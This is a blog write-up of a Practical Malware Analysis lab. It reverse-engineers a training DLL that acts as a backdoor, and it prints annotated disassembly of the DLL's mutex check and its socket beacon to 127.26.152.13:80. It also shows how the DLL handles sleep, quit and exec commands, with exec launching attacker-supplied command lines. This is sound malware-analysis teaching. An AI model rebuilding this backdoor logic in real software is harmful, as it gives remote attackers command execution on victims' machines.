Post

0x02_Lab01-01-part02

Posted
By silma 3 min read

Overview

FilenameSizeMD5
Lab01-01.exe16 KBbb7425b82141a1c0f7d60e5106676bb1
Lab01-01.dll160 KB290934c61de9176ad682ffdd65f0a669

TL;DR: The malicious DLL creates a mutex named SADFHUHF, opens a socket to 127.26.152.13:80, sends a hello beacon and processes the commands it eventually receives from a remote attacker. This is the second part of Lab01-01, focusing on the malicious DLL. First part is here.

Tools: IDA Free 7.0, x32dbg

IDB: Lab01-01_dll.i64

Analysis of the malicious DLL

If the malicious DLL is loaded, the _DLLMain() function is executed:

1
2
3
4

0x10001342    push    edi             ; lpvReserved
0x10001343    push    esi             ; fdwReason
0x10001344    push    ebx             ; hinstDLL
0x10001345    call    _DLLMain

Mutex

The _DLLMain() function starts by checking the existence of a mutex named SADFHUHF with a call to OpenMutexA. If the mutex already exists the codeflow jumps to the end of function, else the mutex is created:

1
2
3
4

0x10001067    push    offset Name     ; "SADFHUHF"
0x1000106C    push    eax             ; bInitialOwner
0x1000106D    push    eax             ; lpMutexAttributes
0x1000106E    call    ds:CreateMutexA

Socket

Then, a socket is created in order to communicate with IP address 127.26.152.13 on port 80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

0x10001078    push    ecx             ; lpWSAData
0x10001079    push    202h            ; wVersionRequested
0x1000107E    call    ds:WSAStartup   ; init. Winsock usage
0x10001084    test    eax, eax
0x10001086    jnz     exit
0x1000108C    push    IPPROTO_TCP     ; protocol
0x1000108E    push    SOCK_STREAM     ; type
0x10001090    push    AF_INET         ; af
0x10001092    call    ds:socket       ; create socket
0x10001098    mov     esi, eax
0x1000109A    cmp     esi, 0FFFFFFFFh
0x1000109D    jz      cleanup
0x100010A3    push    offset cp       ; "127.26.152.13"
0x100010A8    mov     [esp+120Ch+name.sa_family], AF_INET
0x100010AF    call    ds:inet_addr    ; proper formatting
0x100010B5    push    80              ; hostshort (port)
0x100010B7    mov     dword ptr [esp+120Ch+name.sa_data+2], eax ; IP
0x100010BB    call    ds:htons        ; to network byte order
0x100010C1    lea     edx, [esp+1208h+name]
0x100010C5    push    10h             ; namelen
0x100010C7    push    edx             ; name
0x100010C8    push    esi             ; s
0x100010C9    mov     word ptr [esp+1214h+name.sa_data], ax ; port
0x100010CE    call    ds:connect     ; connect to 127.26.152.13:80

If the connection is successful, the string hello is sent:

1
2
3
4

0x100010FA    push    ecx             ; len
0x100010FB    push    offset buf      ; "hello"
0x10001100    push    esi             ; s
0x10001101    call    ds:send

And data are received:

1
2
3
4
5
6
7
8

0x10001122    push    0               ; flags
0x10001124    lea     eax, [esp+120Ch+data_recieved]
0x1000112B    push    1000h           ; len
0x10001130    push    eax             ; buf
0x10001131    push    esi             ; s
0x10001132    call    ds:recv
0x10001138    test    eax, eax
0x1000113A    jle     short retry

Commands

The malicious DLL can process 3 commands: sleep, q (quit) and exec.

sleep

Sleep for 0x60000 milliseconds:

1
2
3
4
5
6
7
8
9
10

0x10001143    push    5               ; MaxCount
0x10001145    push    ecx             ; data received
0x10001146    push    offset Str1     ; "sleep"
0x1000114B    call    ebp ; strncmp
0x1000114D    add     esp, 0Ch
0x10001150    test    eax, eax
0x10001152    jnz     short dont_sleep
0x10001154    push    60000h          ; dwMilliseconds
0x10001159    call    ds:Sleep
0x1000115F    jmp     short retry

q

Close socket and quit:

1
2

100011B6    cmp     [esp+1208h+data_received], 'q'
100011BE    jz      short cmd_quit

exec

Uses the string following the command exec to set the parameter lpCommandLine of the API CreateProcessA:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

0x10001161    lea     edx, [esp+1208h+data_received]
0x10001168    push    4               ; MaxCount
0x1000116A    push    edx             ; Str2
0x1000116B    push    offset aExec    ; "exec"
0x10001170    call    ebp ; strncmp
0x10001172    add     esp, 0Ch
0x10001175    test    eax, eax
0x10001177    jnz     short dont_exec
[...]
0x1000118C    push    eax             ; lpProcessInformation
0x1000118D    push    ecx             ; lpStartupInfo
0x1000118E    push    0               ; lpCurrentDirectory
0x10001190    push    0               ; lpEnvironment
0x10001192    push    8000000h        ; dwCreationFlags
0x10001197    push    1               ; bInheritHandles
0x10001199    push    0               ; lpThreadAttributes
0x1000119B    lea     edx, [esp+1224h+data_received+5] ; ->after "exec "
0x100011A2    push    0               ; lpProcessAttributes
0x100011A4    push    edx             ; lpCommandLine
0x100011A5    push    0               ; lpApplicationName
0x100011A7    mov     [esp+1230h+StartupInfo.cb], 44h
0x100011AF    call    ebx ; CreateProcessA
0x100011B1    jmp     retry

If an unrecognised commmand is received, the DLL sleeps for 0x60000 milliseconds and loops up to the sending of the hello string.

EOF

series, Practical Malware Analysis
malware analysis reverse engineering tcp socket backdoor
This post is licensed under CC BY 4.0 by the author.